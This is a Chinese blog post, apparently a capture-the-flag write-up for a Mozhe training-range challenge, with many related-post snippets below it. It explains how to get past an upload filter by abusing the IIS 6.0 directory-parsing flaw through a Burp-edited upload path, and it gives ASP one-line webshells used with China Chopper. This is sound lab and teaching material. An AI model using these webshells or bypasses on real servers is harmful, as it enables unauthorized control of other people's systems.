墨者 - 内部文件上传系统漏洞分析溯源

最新推荐文章于 2023-02-24 22:04:16 发布
原创 最新推荐文章于 2023-02-24 22:04:16 发布 · 755 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何利用IIS 6.0的漏洞进行文件上传攻击,包括尝试直接上传php文件失败,修改为asp及jpg格式的测试,最终通过构建特殊Content-Disposition头实现上传。文章还提供了具体的payload实例,并解释了如何绕过限制,成功上传并执行asp木马。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

直接上传php文件,失败

F12控制器看下,发现是url是asp

修改为asp文件,同样不行

而且改为jpg文件上传成功后,发现是IIS/6.0

上网查找IIS/6.0得漏洞

   在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。

一句话木马 asp版

<%eval request ("pass")%>

上传一个txt文件,然后使用bp

这里解释一下header里面的Content-Disposition,我一直很好奇为什么网上的人都知道改这里, Content-disposition 是 MIME 协议的扩展,MIME 协议指示 MIME 用户代理如何显示附加的文件。这里客户端发送这个给服务端,意思是让服务端创建一个upload的文件(后来用bp改为1.asp)的同时,将接收asp.txt的文件放入该目录下,这样子就达到了构建IIS/6.0得漏洞的条件了。

文件上传成功,菜刀无惧链接

 

内部文件上传系统漏洞分析溯源墨者学院
m0_67352890的博客
10-27 443
内部文件上传系统漏洞分析溯源墨者学院
墨者靶场 入门:内部文件上传系统漏洞分析溯源
qq_43233085的博客
01-15 735
墨者靶场 入门:内部文件上传系统漏洞分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 在为某公司检测后台页面时,你发现了一个上传页面,该页面做了一些防护,你需要尝试绕过并上传webshell,以获得网站根目录访问权限 实训目标 1、熟悉常见中间件存在的解析漏洞; 2、熟悉一句话木马的使用与制作 3、熟悉常见的上传漏洞利用方法 解题方向 1、试探允许上传的文件类型 2、观察服务器在处理...
墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源
m_de_g的博客
02-24 1169
7.经过测试发现不行,那么查看一下操作系统的版本Microsoft-IIS/6.0。6.有个问题就是服务器将我们所上传的文件进行了重命名,故我们应该想办法截断。8.看看此服务器有没有什么漏洞,发现此版本有文件解析漏洞。,那么此目录下的所有文件就会被当做asp执行。:使用菜刀连接,一开始我还以为马儿有问题。9.把文档中的内容替换成一句话木马。12.接下来,使用菜刀连接。5.上传报错,将其改名为。1.选择合适的文件上传。3.可以推测出此站点为。11.改上传的路径为。
墨者题解_内部文件上传系统漏洞分析溯源
weixin_43072923的博客
04-08 462
墨者学院——内部文件上传系统漏洞分析溯源 根据背景: 我们可以尝试该页面做了什么防护: 首先尝试输入php或者asp文件,发现不行: 再次尝试txt、jpg等文件,发现可以上传: 通过F12查看其服务,为IIS/6.0: 上百度搜索IIS的漏洞,知道了当我们上传xxx.asp文件时,该文件以后的子文件都以asp文件来执行,例如ccooll.asp后面有子文件ccooll.jpg,则/ccooll.asp/ccooll.jpg以asp文件执行。 接下来,我们便开始getshel.
墨者学院-入门级-内部文件上传系统漏洞分析溯源-小白必看(超详细)
kitiu666的博客
01-28 1594
2021年1月26日,第七次渗透测试。 准备需求: 1、win10系统; 2、中国菜刀; 3、bp拦截工具(不懂的看我以前的博客,有介绍); 1、进入靶场,有一个文件上传口; 2、我们新建一个文本文件,里面写上一句话木马; 一句话木马:<%eval request (“a”)%> (这里的’a’是中国菜刀上的webshell密码,可自行更改;) 3、上传文件,拦截请求包; 以下为拦截包数据截图: 修改包数据,把“upload”改为“1.asp”; 然后释放拦截包,返回浏览器页面; 4、可
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第1题)
qq_43233085的博客
01-15 1222
墨者靶场 入门:WebShell文件上传漏洞分析溯源 第1题题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某公司内部资料分享平台存在一个文件上传页面,为了保证服务器的安全,现在安全工程师“墨者”将对该上传页面进行安全检测,看是否存在安全漏洞影响服务器的安全性。 实训目标 1、了解PHP及PHP5各个版本的相关知识; 2、了解PHP上传绕过扩展名的方法; 3、了解Burpsuite的使用方...
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)
qq_43233085的博客
01-16 1074
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞。 实训目标 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法...
墨者学院在线靶场WP
心想事成
12-22 1032
我们知道 HTTP 连接基于 TCP 连接,HTTP 协议中没有 IP 的概念,Remote Address 来自 TCP 连接,表示与服务端建立 TCP 连接的设备 IP,在这个例子里就是 IP3。Remote Address 无法伪造,因为建立 TCP 连接需要三次握手,如果伪造了源 IP,无法建立 TCP 连接,更不会有后面的 HTTP 请求。可以看到,XFF 的内容由「英文逗号 + 空格」隔开的多个部分组成,最开始的是离服务端最远的设备 IP,然后是每一级代理设备的 IP。
文件上传漏洞 —— 内部文件上传系统漏洞分析溯源
vergilben的学习日记
04-11 1979
文件上传漏洞 —— 内部文件上传系统漏洞分析溯源 这篇主要复现墨者学院的一个内部文件上传漏洞,内部文件上传系统漏洞分析溯源,还有另一题会写到另一篇里面。 关于文件上传漏洞,前面我的博客里面有写原理以及简单的实现,再写一下其原理。 文件上传漏洞原理:大部分的网站和应用系统都有上传功能,如用户头像上传、图片上传、文档上传等。一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻...
内部文件上传系统漏洞分析溯源
weixin_47493074的博客
09-16 498
首先根据服务器版本IIS6.0可以判断,利用IIS低版本的解析漏洞。2、IIS解析漏洞分为两种:(IIS6.0在解析asp格式的时候有两个解析漏洞,一个是如果目录名包含“.asp“字符串,那么这个目录下所有的文件都会按照asp去解析,另一个是只要文件名中含有".asp;实战:上传一个asp类型的一句话木马,一定要是asp类型的,然后burp抓包,在GuFolderPath下的upload为upload/*.asp,然后菜刀过去,脚本类型改asp,进入打开inetpub下wwwroot找到key。
墨者学院06 内部文件上传系统漏洞分析溯源
weixin_42789937的博客
01-28 537
墨者学院06 内部文件上传系统漏洞分析溯源~友情提示:这道题目我用蚁剑连接失败了,原因不知...所以有可能不是靠谱的WP...
内部文件上传系统漏洞分析溯源(墨者学院)
qq_44060093的博客
03-28 405
很简单的一个文件上传漏洞,我去学到了不一样的知识 实训目标 1、熟悉常见中间件存在的解析漏洞; 2、熟悉一句话木马的使用与制作 3、熟悉常见的上传漏洞利用方法 解题方向 1、试探允许上传的文件类型 2、观察服务器在处理完上传任务后返回的内容,获取上传路径 3、尝试修改上传路径,观察服务器是否允许写入权限 题目底下的神评论 1、目录解析、以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。...
墨者内部文件上传系统漏洞分析溯源题解
zr1213159840的博客
12-23 673
题目是一个上传的功能,要求找到key 先正常上传一个文件看看 能看出来这是一个asp的网站,iis6.0存在一个文件解析漏洞,在xxx.asp文件夹下面的任何文件格式都会按照asp的格式执行,比如xxx.asp/1.jpg就会将这和1.jpg按照asp格式执行。 既然如此,我们可以整个asp的一句话木马 将其命名为q.txt后上传,然后使用burpsuite抓包,修改以下地方为1.asp 然后上传 上传成功后用蚁剑进行连接 然后连接上去,拿到key 参考: https://zhuanlan.z
墨者学院-内部文件上传系统漏洞分析溯源
qq_37850901的博客
09-25 225
墨者学院-内部文件上传系统漏洞分析溯源 首先正常上传一个txt文件,抓包,发现是iis6.0,了解到这个版本的服务器有个解析漏洞,来加以利用 于是我们更改一下upload的路径木马我们已经预先写道txt里了<%execute request(“MH”)%> 菜刀链接这个地址,找到key ...
0x0B.内部文件上传系统漏洞分析溯源
qq_31679787的博客
09-21 191
经过测试,服务器为IIS,且上传后的文件会被重命名,但是能够修改上传路径; 上传asp一句话木马,使用bp抓包,修改文件上传路径以及文件后缀名; 上传成功并且能够解析; 使用菜刀连接; 在目录中找到key文件; ...
墨者学院WebShell文件上传漏洞分析溯源(第1题)
最新发布
04-03
### 墨者学院 WebShell 文件上传漏洞分析溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序,攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值